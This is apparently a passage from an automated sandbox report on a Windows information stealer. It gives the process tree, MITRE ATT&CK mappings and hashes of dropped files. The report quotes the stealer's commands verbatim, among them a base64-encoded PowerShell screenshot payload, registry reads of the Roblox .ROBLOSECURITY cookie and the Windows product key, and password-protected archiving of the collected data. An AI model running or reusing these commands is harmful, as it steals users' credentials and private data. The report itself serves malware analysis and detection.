AAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:2372
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:316
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vqxwj3wg\vqxwj3wg.cmdline"
        6⤵
        
        PID:5848
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES66C8.tmp" "c:\Users\Admin\AppData\Local\Temp\vqxwj3wg\CSCFAA651B2C0145D8817DD37ED4D853.TMP"
        7⤵
        
        PID:6028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5312
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5432
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5664
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5724
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5940
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5964
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2652
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1908
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5388
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:2772
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\FX57j.zip" *"
      4⤵
      PID:5192
    - - C:\Users\Admin\AppData\Local\Temp\_MEI34202\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI34202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\FX57j.zip" *
        5⤵
        Executes dropped EXE
        
        PID:5264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3932
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:2088
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2420
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:2528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        
        PID:5504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4280
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:2884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:1216

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5284
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5700
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.0.1827959631\1310924309" -parentBuildID 20230214051806 -prefsHandle 1800 -prefMapHandle 1792 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82a7365f-3eda-4243-973b-bc7c5fefbcff} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 1880 29327523a58 gpu
    3⤵
    PID:5528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.1.389338146\2146442027" -parentBuildID 20230214051806 -prefsHandle 2420 -prefMapHandle 2416 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {291481b3-a42b-472c-b555-d5dd3094a0c3} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 2448 2931a88a258 socket
    3⤵
    PID:5900
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.2.1444689224\1647207468" -childID 1 -isForBrowser -prefsHandle 2948 -prefMapHandle 2944 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1244 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35e8dead-28e8-45a5-82a6-0a9cb5ce278d} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 2960 29329ff6b58 tab
    3⤵
    PID:5944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.3.1641800173\1118929830" -childID 2 -isForBrowser -prefsHandle 848 -prefMapHandle 1124 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1244 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d238b2f-72a6-41cc-b29b-a1e7c41a1c8a} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 3692 2931a87a858 tab
    3⤵
    PID:6088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.4.238612751\970908903" -childID 3 -isForBrowser -prefsHandle 5240 -prefMapHandle 5236 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1244 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb4e2dea-0fea-44a4-91d7-093e03717368} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 5248 2931a878158 tab
    3⤵
    PID:3400
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.5.978615011\1028603962" -childID 4 -isForBrowser -prefsHandle 5464 -prefMapHandle 5460 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1244 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9401893c-6871-43c9-9f70-716652340f60} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 5472 2932e958b58 tab
    3⤵
    PID:3320
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5700.6.1681704963\1919635624" -childID 5 -isForBrowser -prefsHandle 5624 -prefMapHandle 5628 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1244 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4a998f1-f291-4025-b099-c9baa6cde8d6} 5700 "\\.\pipe\gecko-crash-server-pipe.5700" 5364 2932e95ac58 tab
    3⤵
    PID:5260

C:\Users\Admin\discord.exe
C:\Users\Admin\discord.exe
1⤵
PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Built.exe

Filesize
7.4MB

MD5
7e312ac869e50b5847ff56eab59567d2

SHA1
3bcefc87de994260931ac94760e6b478696048be

SHA256
5a77b59bd2f5486fbb176fe7c7e8cc478419247c142e5ea7db8d14966bccb5af

SHA512
fb9a3658a636644d2df12c2ca1d6f399c84e571491a0dab888d798e5b9ccfb648e077cb90dfbffd5ad24f85441fafc1bb887b160263a2d53577c5db1adf892ee

Download Submit
C:\ProgramData\Discord.exe

Filesize
148KB

MD5
93fc7ea878e7064b106d4523933c2af5

SHA1
49606faf1859f5fc620da49462a1454387c23333

SHA256
5c783017b84a20693aea8d02ac1bad7235c063bcec361d38dea45b9ab4be3395

SHA512
ed0e2f31c9849fd8be3d0121410f324a59b90952d3a34f6af56513d9c2840c009ceeb230a21c37eaca7cd7c908ab532eb783d632d711967f74bcedba98339e62

Download Submit
C:\ProgramData\test.bat

Filesize
435B

MD5
40f36b839af3aad8887e3cfe758efab8

SHA1
2d60ce25bf47ce4c4969cd73bd204491a3e2d18e

SHA256
c9650c17cca714b78e175479a9d9bcf2b6d01629d00418fc2f2b9167563ecb1d

SHA512
13ee91dde3b5c6920fc94df15e1d37f66f009a3b5d770fc747d7000a8c4d5091dddaf642b3f1edf01e3ac7f63b652576525401a801c6e4f7621860070f667f8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0093819c829dd30c13746f256efba97f

SHA1
f095cbb1d10a54a91d7d341c4098d44973d3ec50

SHA256
5f936c252c9ed7d08d4a73b86230d9877173b44c36544f0b24eae3eb38617401

SHA512
72aac852de41473494d2263aa44dbabfb1f318f8a21ebdfe080c4a98b9288db07e9641a935d9a640b5e879f28a0560cae53bd4191ac94d315b87746e57e69af2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a9ce891ee24f7735c5fd4d3259faac12

SHA1
ba77a8a6ff4bc0316cc224d776f4c4b900b833af

SHA256
0452059c03156daeb99522f31f43ae2f4008b26f4a67298a6d8f3e13f431d5a3

SHA512
01d5cd5e1e94edcd37056c8b3cd48706ba93acffa3312135ed76e4ed83402ef7fe78572f002aadbde924e69d0e3e522e70820ec3f78d157e9f0a9db419387ba0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae400162c5ca394a330ec2798e53c3f1

SHA1
af3a93d87a7a792a99ac0075cd17a9802eb5b4b6

SHA256
f3e9d7997043d83fd9a254bd0a70720db11528a2c7c247e40b2a428dc3c86660

SHA512
7a5acede52d6dff8bf451f9706f4e87501a47db9810fa0e94e37b947a03e0b770c14295cfe3428430ef2a18b81fdd9ca81265ba5ed7695dc7bd378e5dd12814c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2524e72b0573fa94e9cb8089728a4b47

SHA1
3d5c4dfd6e7632153e687ee866f8ecc70730a0f1

SHA256
fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747

SHA512
99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
01fff31a70e26012f37789b179059e32

SHA1
555b6f05cce7daf46920df1c01eb5c55dc62c9e6

SHA256
adf65afaf1c83572f05a99bf2ede8eb7be1aab0717d5254f501d5e09ba6f587b

SHA512
ac310c9bc5c1effc45e1e425972b09d1f961af216b50e1a504caa046b7f1a5f3179760e0b29591d83756ecb686d17a24770cf06fcea57e6f287ca5bbf6b6971b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e60eb305a7b2d9907488068b7065abd3

SHA1
1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

SHA256
ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

SHA512
95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ossp351b.default-release\activity-stream.discovery_stream.json.tmp

Filesize
28KB

MD5
6a59791e35dc4b63d4346c22f6f56b20

SHA1
a3e3fdd643824639a4b2aef360ddf47a4bf6817d

SHA256
41468736bdb2336215931e831e152fbe8e2be2e719c90cd2d1750d3514d67b2e

SHA512
24225460b694232a22b8e02ebdfdbe14fdb850c229fc328fb94e9ae56273495169f8d8700f975abc458e636c406ad4c16ee830710a5bfa61921d38338274f09b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ossp351b.default-release\activity-stream.discovery_stream.json.tmp

Filesize
26KB

MD5
a45c89b8dec7452781a431028a459e4c

SHA1
7e2d9956b983b128d6c434628aa5d3076a755ab3

SHA256
9541c9c445f3c496cf5fa34da5321ad6343cfb29081050b3a55fb6d3873433cf

SHA512
